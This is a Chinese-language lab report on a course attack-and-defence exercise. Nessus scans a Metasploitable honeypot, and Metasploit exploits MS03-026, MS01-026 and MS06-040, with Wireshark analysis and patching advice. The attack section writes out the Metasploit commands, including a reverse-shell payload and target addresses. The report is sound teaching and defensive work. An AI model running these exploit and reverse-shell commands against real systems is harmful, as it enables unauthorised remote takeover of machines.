在本次攻防實踐中，攻擊方使用Nessus掃描軟件發(fā)現(xiàn)到目標主機的特定網絡服務漏洞，并使用Metasploit軟件發(fā)起攻擊;防御方架設蜜罐， 并使用WireShark軟件捕獲并分析針對蜜罐主機的掃描和攻擊流量。以下給出攻防實踐報告，分實驗環(huán)境、掃描過程、攻擊過程、漏洞修復與攻擊防范四個 部分分別介紹。

實驗環(huán)境

在本次攻防實踐中，攻擊方和防御方各使用一臺宿主機。攻擊方使用宿主機中的一臺VMware虛擬機向防御方宿主機中的一臺VMware虛擬機發(fā)起探測和攻擊。

本次攻防實踐基于真實網絡環(huán)境，網絡拓撲如下圖所示，攻擊方宿主機位于紫荊公寓，IP地址為59.66.207.31。其中的VMware虛擬機使 用課程FTP上提供的WinXP Attacker鏡像，并使用橋接方式與宿主機連接，其IP地址為59.66.207.91。防御方位于FIT大樓，IP地址為 166.111.132.216。其中的VMware虛擬機使用課程FTP上提供的Win2KS Metasploitable鏡像，并使用橋接方式與宿主機連接，其IP地址為166.111.132.232。

圖1 實驗環(huán)境拓撲

WinXP Attacker使用Nessum軟件掃描Win2KS Metasploitable，在獲得漏洞后，在Metasploit攻擊框架中尋找到相應漏洞的攻擊模塊發(fā)動攻擊。防御方在宿主機上安裝有 WireShark軟件，由于所有去往Win2KS Metasploitable的流量都經過防御方宿主機的物理網卡，所以可以使用宿主機上的WireShark軟件監(jiān)聽到去往Win2KS Metasploitable的流量。可以認為Win2KS Metasploitable是防御方設置的蜜罐，而防御方本身使用WireShark作為一個簡單的蜜罐網關，一旦WinXP Attacker對Win2KS Metasploitable進行掃描或攻擊，防御方宿主機就能夠捕獲攻擊流量并進行分析。

掃描過程

攻擊方使用WinXP Attacker中的Nessus掃描軟件對防御方網段進行掃描，并發(fā)現(xiàn)了蜜罐主機的存在。Nessus軟件除了掃描對端主機開放的端口和服務外，還可以選擇大量的插件，來實現(xiàn)對操作系統(tǒng)或軟件所提供的網絡服務中漏洞的掃描。

攻擊方首先使用默認的配置對蜜罐進行掃描，并獲得了掃描結果報告。圖2顯示的是掃描結果的概要，我們可以看出整個掃描時間持續(xù)了大約3分鐘，被掃描 主機開放了69各端口，并存在大量的不安全因素。Nessus將其按危險程度分為High、Medium和Low三類，可以發(fā)現(xiàn)該蜜罐主機有30個極其危 險的安全漏洞存在。另外還能獲得被掃描主機的操作系統(tǒng)、域名、本地賬戶口令相關的一些信息。

圖2 默認配置的掃描結果

分類為High的漏洞大部分都有MS安全漏洞編號，包 括：MS01-026，MS01-044，MS02-045，MS03-026，MS03-039，MS03-043，MS04-007，MS04-011，MS04-012，MS04-022，MS04-035，MS04-036，MS05-027，MS05-039，MS05-043，MS05-047，MS05-051，MS06-018，MS06-035，MS06-040，MS07-065，MS08-065，MS09-001，MS09-039，MS10-025。

為了簡化實驗過程，本次攻防實踐中只針對windows所提供的網絡服務中的一個漏洞MS03-026進行。如圖3所示，這是微軟2003年公布 的一個漏洞，可以利用遠程過程調用(Remote Procedure Call，RPC)的接口(具體位于RemoteActivation()函數(shù))進行緩沖區(qū)溢出攻擊。

圖3 掃描結果中顯示的MS03-026漏洞

我們在Nessus軟件中配置插件，使其只針對特定的漏洞進行掃描。如圖4所示，我們在Nessus插件列表中找到windows: Microsoft Bulletins，即微軟公布的漏洞列表。進入該列表中我們就能夠選定MS03-026。

圖4 針對MS03-026漏洞的掃描軟件配置

之后攻擊方對蜜罐主機發(fā)起掃描，在掃描結果中顯示蜜罐主機存在MS03-026漏洞，如圖5所示。

圖5 Nessus掃描結果中顯示的MS03-026漏洞

在這次掃描過程中，防御方宿主機開啟了WireShark，并記錄下了掃描的過程。該過程分為兩個部分，分別是端口掃描，和針對MS03-026 漏洞的掃描。在端口掃描部分，WireShark顯示出大量從59.66.207.91(即WinXP Attacker)發(fā)往166.111.132.232即(Win2KS Metasploitable)各個端口的[SYN]報文，同時能夠發(fā)現(xiàn)Win2KS Metasploitable的回應[SYN, ACK]或[RST, ACK]報文。

在MS03-026漏洞掃描部分，WinXP Attacker向Win2KS Metasploitable的135、139和445等端口發(fā)送了大量request文。

攻擊過程

攻擊方使用WinXP Attacker中的Metasploit軟件發(fā)起攻擊。Metasploit的配置過程如圖6所示，首先選擇針對MS03-026的漏洞攻擊模塊，該模 塊屬于針對RPC的攻擊，使用命令exploit/windows/dcerpc/ms03_26_dcom;接下來選擇PAYLOAD，使用命令set PAYLOAD generic/shell_reverse_tcp;再分別設置本地主機和遠程主機，使用命令set LHOST 59.66.207.91和set RHOST 166.111.132.232。最后使用命令exploit發(fā)起攻擊并獲得了遠程主機，即Win2KS Metasploitable的控制權。

圖6 Metasploit配置過程

在這次攻擊過程中，防御方宿主機仍然開啟WireShark，并記錄下了攻擊的過程。WireShark顯示攻擊來自59.66.207.91(即 WinXP Attacker)，目標為166.111.132.232即(Win2KS Metasploitable)，而整個攻擊過程雙方來回的報文只有20個，我們在此詳細分析一下這個過程。

l 前5個數(shù)據(jù)包：WinXP Attacker使用7937端口向Win2KS Metasploitable的135端口發(fā)起TCP連接和bind請求;

l 第6-8個數(shù)據(jù)包：應該就是WinXP Attacker使用已經建立的連接向Win2KS Metasploitable發(fā)送shellcode，通過后者的漏洞造成緩沖區(qū)溢出，在其4444端口上綁定了一個shell;

l 第9-12個數(shù)據(jù)包：Win2KS Metasploitable使用4444端口向WinXP Attacker的1049端口發(fā)起反向TCP連接;

l 第13-16個數(shù)據(jù)包：雙方拆除了基于135端口建立的TCP連接;

l 第17-20個數(shù)據(jù)包：Win2KS Metasploitable向WinXP Attacker發(fā)送[PSH ACK]數(shù)據(jù)包，在本地執(zhí)行cmd.exe并通過之前的連接回傳，此時攻擊者已能任意訪問遠程資源。

另外我們還針對Win2KS Metasploitable的其他幾個漏洞發(fā)起了攻擊，成功的包括MS01-026和MS06-040，分別使用exploit/windows /iis/ms01-026和exploit/windows/smb/ms06-040攻擊模塊。以下是Metasploit控制臺攻擊過程截圖：

圖7 針對MS01-026和MS06-040的攻擊

漏洞修復與攻擊防范

一旦了解了攻擊者所利用的漏洞，首先應尋找修復的方法。微軟提供了安全漏洞公告與補丁下載的網站http://www.microsoft.com/technet/security/current.aspx。下圖是微軟對本次實驗利用的MS03-026漏洞的描述。

圖8 微軟發(fā)布的MS03-26漏洞公告及補丁下載頁面

對于防御Windows網絡服務遠程滲透攻擊的方法，首要的是盡快為操作系統(tǒng)與軟件更新安全補丁，同時可以利用漏洞掃描軟件來發(fā)現(xiàn)漏洞的存在并及時 修補。另外，攻擊者會利用一些開放的端口實施漏洞掃描(如掃描MS03-026漏洞時訪問的135,139和445等端口)，因此開啟防火墻禁止相關端口 的訪問也將是防御遠程攻擊的有效方式